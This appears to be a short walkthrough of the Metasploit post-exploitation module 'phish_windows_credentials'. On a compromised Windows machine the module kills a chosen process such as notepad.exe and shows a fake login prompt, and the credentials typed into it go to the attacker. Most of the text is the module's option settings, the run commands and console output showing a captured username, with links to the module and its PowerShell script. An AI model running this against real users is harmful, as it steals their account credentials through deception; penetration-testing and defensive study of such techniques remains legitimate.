Description:
This module is able to perform a phishing attack on the target by
popping up a loginprompt. When the user fills credentials in the
loginprompt, the credentials will be sent to the attacker. The
module is able to monitor for new processes and popup a loginprompt
when a specific process is starting. Tested on Windows 7.
When notepad.exe is opened in target machine, there will be a login manager window. If you provide the right password, notepad window will appear, or it will continue until you hate it.
msf post(phish_windows_credentials) > show options
Module options (post/windows/gather/phish_windows_credentials):
Name Current Setting Required Description
---- --------------- -------- -----------
DESCRIPTION {PROCESS_NAME} needs your permissions to start. Please enter user credentials yes Message shown in the loginprompt
PROCESS no Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)
SESSION yes The session to run this module on.
msf post(phish_windows_credentials) > set SESSION
SESSION =>
msf post(phish_windows_credentials) > set PROCESS notepad.exe
PROCESS => notepad.exe
msf post(phish_windows_credentials) > run
[+] PowerShell is installed.
[*] Monitoring new processes.
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] New process detected: notepad.exe
[*] Killing the process and starting the popup script. Waiting on the user to fill in his credentials...
[+] #< CLIXML
[+]
[+] UserName Domain Password
-------- ------ --------
nfs nfs-
[1].https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/
[2].https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb
[3].https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1